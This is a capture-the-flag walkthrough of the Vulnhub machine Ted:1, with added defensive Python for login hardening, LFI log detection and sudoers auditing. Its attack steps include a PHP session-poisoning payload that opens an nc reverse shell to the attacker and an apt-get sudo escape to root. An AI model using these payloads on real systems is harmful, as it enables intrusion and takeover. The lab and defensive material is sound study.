Ted:1 Vulnhub Walkthrough

September 24, 2020 by Nasef


Ted:1 is a machine on which I used a Local File Inclusion vulnerability to obtain shell access and then exploited misconfigured sudo permissions to get root access.


As always, I started by scanning with nmap.

nmap -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 09:58 EDT
Nmap scan report for
Host is up (0.00077s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds

Port 80 is the only open port.

Web Enumeration

Then I enumerated directories and files using gobuster.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x html,php
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php
[+] Timeout:        10s
2020/09/24 09:58:18 Starting gobuster
/index.php (Status: 200)
/home.php (Status: 302)
/logout.php (Status: 302)
/cookie.php (Status: 302)
/authenticate.php (Status: 302)
/server-status (Status: 403)
2020/09/24 09:59:06 Finished

An interesting file is cookie.php. Although it didn't help me get a shell directly, it gave me a hint about using a cookie together with the LFI to gain one.

Brute forcing

I found a login form in index.php, so I tried sqlmap to test for SQL injection, but the form isn't vulnerable to it. Then I started testing inputs and watching the error messages, and that was fruitful. The error messages gave me hints about the correct username, then the correct password, and finally the correct hashing algorithm. You can see the difference below.

Username guessing


Password guessing


Hashing Algorithm guessing


The correct username is admin and the correct password is the SHA-256 hash of the word admin.
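The weakness that made the guessing work is the login handler answering with a different message for each failing field. The following is an added example (not code from the walkthrough or from the Ted:1 machine) that puts a leaky check beside a hardened one. It assumes the form submits a username, an already-hashed password and an algorithm name; the credential store is constructed to mirror the page's valid login, admin with sha256("admin").

```python
import hashlib
import hmac

# Constructed credential store mirroring the walkthrough's valid login.
ADMIN_SHA256 = hashlib.sha256(b"admin").hexdigest()
LEAKY_USERS = {"admin": ("sha256", ADMIN_SHA256)}


def verbose_login(username, password_hash, algorithm):
    """Oracle-style check: every failure has its own message, so a tester can
    confirm the username, then the password hash, then the algorithm in turn."""
    if username not in LEAKY_USERS:
        return "Unknown username"
    stored_alg, stored_hash = LEAKY_USERS[username]
    if password_hash != stored_hash:
        return "Wrong password"
    if algorithm != stored_alg:
        return "Wrong hashing algorithm"
    return "Welcome"


GENERIC_ERROR = "Invalid username or password"
_ITERATIONS = 100_000
_DEMO_SALT = b"constructed-demo-salt"  # demo only; use a random per-user salt


def _derive(password, salt):
    # The server fixes the scheme; the client never chooses an algorithm.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, _ITERATIONS)


SAFE_USERS = {"admin": (_DEMO_SALT, _derive("admin", _DEMO_SALT))}
# Dummy record so unknown usernames cost the same work as known ones.
_DUMMY = (_DEMO_SALT, _derive("not-a-real-password", _DEMO_SALT))


def hardened_login(username, password):
    """Uniform check: one message and the same amount of work on every failure,
    and a constant-time comparison of the derived key."""
    salt, stored = SAFE_USERS.get(username, _DUMMY)
    candidate = _derive(password, salt)
    if hmac.compare_digest(candidate, stored) and username in SAFE_USERS:
        return "Welcome"
    return GENERIC_ERROR
```

With the hardened version, a wrong username and a wrong password produce byte-identical responses, so the field-by-field guessing shown in the screenshots above has nothing to work with.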

Local File Inclusion

When I typed /etc/passwd it retrieved the content of the file, so it's clearly an LFI vulnerability.

After many attempts, like reading /etc/shadow and log poisoning via the Apache logs, I found a suspicious cookie. So I tried changing its value and accessing /var/lib/php/sessions/sess_ via the browser, and it worked!

Immediately I changed the cookie value to

<?php system("nc [ip] 9999 -e /bin/sh")?>

but URL encoded as


and started listening on my machine and refreshed the page. I got a shell!

root@kali:/home/kali# nc -lvnp 9999
listening on [any] 9999 ...
connect to [] from (UNKNOWN) [] 57674
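From the defender's side, both halves of this chain leave traces in the web server log: the file parameter carries traversal sequences or absolute paths such as /etc/passwd and the PHP session directory, and the poisoned cookie carries a PHP open tag. The following is an added example (not part of the walkthrough) that runs that detection over constructed Apache log lines. It assumes a combined LogFormat with the request cookie appended as a quoted field (%{Cookie}i), and a file= query parameter as the include point, neither of which the page specifies.

```python
import re
from urllib.parse import unquote_plus

# Combined log format with the Cookie header appended as one more quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)

# Paths whose appearance in a request is worth an alert on a PHP host.
SENSITIVE_PATHS = (
    "/etc/passwd",
    "/etc/shadow",
    "/var/lib/php/sessions/sess_",
    "/var/log/apache2/",
    "/proc/self/",
)
PHP_MARKERS = ("<?php", "<?=")

# Constructed sample: one benign request followed by the three steps of the chain.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Sep/2020:10:01:02 -0400] "GET /home.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0" "PHPSESSID=abc123"
10.0.0.9 - - [24/Sep/2020:10:02:15 -0400] "GET /home.php?file=/etc/passwd HTTP/1.1" 200 1840 "-" "curl/7.72" "PHPSESSID=abc123"
10.0.0.9 - - [24/Sep/2020:10:03:40 -0400] "GET /home.php?file=../../../../etc/shadow HTTP/1.1" 200 0 "-" "curl/7.72" "PHPSESSID=abc123"
10.0.0.9 - - [24/Sep/2020:10:04:01 -0400] "GET /home.php?file=/var/lib/php/sessions/sess_abc123 HTTP/1.1" 200 77 "-" "curl/7.72" "PHPSESSID=abc123; user=%3C%3Fphp+system%28%22id%22%29%3F%3E"
"""


def analyse_line(line):
    """Return a record with the reasons a line looks like LFI activity, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode once so %2e%2e%2f and friends are inspected in their plain form.
    target = unquote_plus(m["target"])
    cookie = unquote_plus(m["cookie"])
    reasons = []
    if "../" in target or "..\\" in target:
        reasons.append("path traversal in request")
    for path in SENSITIVE_PATHS:
        if path in target:
            reasons.append(f"sensitive path {path} in request")
    if any(marker in cookie for marker in PHP_MARKERS):
        reasons.append("PHP open tag in cookie (possible session poisoning)")
    return {"ip": m["ip"], "status": int(m["status"]), "target": target, "reasons": reasons}


def find_lfi_attempts(log_text):
    """Keep only the parsed lines that raised at least one reason."""
    findings = []
    for line in log_text.splitlines():
        record = analyse_line(line)
        if record and record["reasons"]:
            findings.append(record)
    return findings


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"], "|", "; ".join(hit["reasons"]))
```

The session-file request followed by a cookie containing an open tag from the same client is the signature of the poisoning step; on the application side, the fix is to never pass user input to include and to resolve the requested page through an allowlist of known names.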

Privilege Escalation

I ran sudo -l and noticed that I can run apt-get as root without a password (NOPASSWD).

sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/apt-get

So I immediately went to https://gtfobins.github.io/ and got the following command, which abuses the sudo privilege given to the apt-get binary:

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

and voilà, root privileges!
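The rule that made this possible grants apt-get to www-data with no password and no argument restriction, so any option, including the Pre-Invoke hook above, is accepted. The following is an added example (not part of the walkthrough) that parses sudo -l output, flags root rules with unrestricted arguments, and shows why pinning the arguments in sudoers would have rejected the command. The sudo -l text is constructed to mirror the page's output plus one argument-restricted rule for contrast; the matcher implements only sudoers' exact-argument rule and ignores wildcards.

```python
import re

# Constructed sudo -l output: the page's apt-get rule plus a pinned rule for contrast.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: /path/to/cmd args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")

# Binaries the page itself shows escaping to a shell through an option.
KNOWN_SHELL_ESCAPES = {
    "/usr/bin/apt-get": "APT::Update::Pre-Invoke runs an arbitrary command as root",
}


def parse_sudo_l(text):
    """Turn the command section of sudo -l into rule dicts."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m["tags"].split()]
        parts = m["cmd"].split()
        rules.append({
            "runas": m["runas"].split(":")[0].strip(),
            "nopasswd": "NOPASSWD" in tags,
            "binary": parts[0],
            # None means sudoers placed no restriction on the arguments.
            "args": parts[1:] if len(parts) > 1 else None,
        })
    return rules


def audit_rules(rules):
    """Report root rules that accept any arguments, with extra detail for known escapes."""
    findings = []
    for rule in rules:
        if rule["runas"] not in ("root", "ALL"):
            continue
        if rule["args"] is None:
            note = f"{rule['binary']}: any arguments as root"
            if rule["nopasswd"]:
                note += ", no password"
            if rule["binary"] in KNOWN_SHELL_ESCAPES:
                note += f" ({KNOWN_SHELL_ESCAPES[rule['binary']]})"
            findings.append(note)
    return findings


def allowed_by_rule(rule, argv):
    """Simplified sudoers matching: the binary must match, and if the rule lists
    arguments the user's arguments must equal them exactly (wildcards ignored)."""
    if argv[0] != rule["binary"]:
        return False
    if rule["args"] is None:
        return True
    return argv[1:] == rule["args"]


if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(finding)
```

Pinning the rule to /usr/bin/apt-get update makes sudo reject the extra -o option, but the real fix is not to hand a package manager to the web server account at all; a service user should have no sudo rules unless a specific, argument-pinned command is genuinely required.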